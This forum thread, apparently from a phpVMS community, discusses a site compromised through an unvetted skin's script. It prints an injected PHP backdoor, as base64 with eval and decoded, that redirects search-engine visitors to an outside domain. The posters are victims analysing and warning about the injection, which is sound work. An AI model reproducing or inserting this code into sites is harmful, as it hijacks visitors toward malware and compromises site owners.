Mal ware

RogerB

Roger do you mean the whole 'This site may harm your device/computer' thing under links? That's all I see that looks abnormal, and that would be expected on the entire site if they suspect malware anywhere on the domain.

And Vansers are you getting it on your site? :s

• Moderators

Guys all the base package is OK, fine, its when you start adding skins and other scripts without verifying what they can do or create on your server, then there becomes a problem.

If other links are placed anywhere on a domain to a site that has been associated as hosting malware then you will most probably get a warning message about it which makes sense.

Thing to remember is look at every script before you put on your site or use, if you dont understand what it can do then dont put it on.

• Like 1

Ok, I am finding this code in some of my files, I also found it in the action.php for phpvms, and I don't remember it being there before.

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnaGhnaGZzNmZnLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

Decoded as follows

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
	header("Location: http://fghhghfs6fg.osa.pl/");
	exit();
}
}
}

• Moderators

Thing is malware is hidden in scripts and will usually look for folders it has permissions to write to, so once you upload a js file or unknown content then potentially every file / folder it can write to it will do to try in this case redirect to a booby trapped site for what ever reason.

Its a right pain to get rid of and fully make sure you are free, its a time consuming task that must be done.

In your example above anyone reaching your site from the popular search engines will be redirected to that site defined in the decode.

• Moderators

Very interesting mark. I didn't really know any of the js triggers to work up on the file permission..... So we are seeing that the virus was from the js file in Rogers skin.

Thats the thing we need to smeck the flies first, but now I started skinnig my own so I dont use released skins.

I think we should keep on eye on that so we don't have malware or anything in the servers.

• Moderators

Hey Eddie, The Vuris came from the JS which was going to be released but it's off, because the JS that Roger has that was a virus. Which he didn't know......

My server was so messed up and messed up over a lot of files. Took me two days to get the server online again.

I wast there on Google Chrome, Big red page with this in it.

Warning: Something's Not Right Here!

www.kesukvirtual.com contains malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.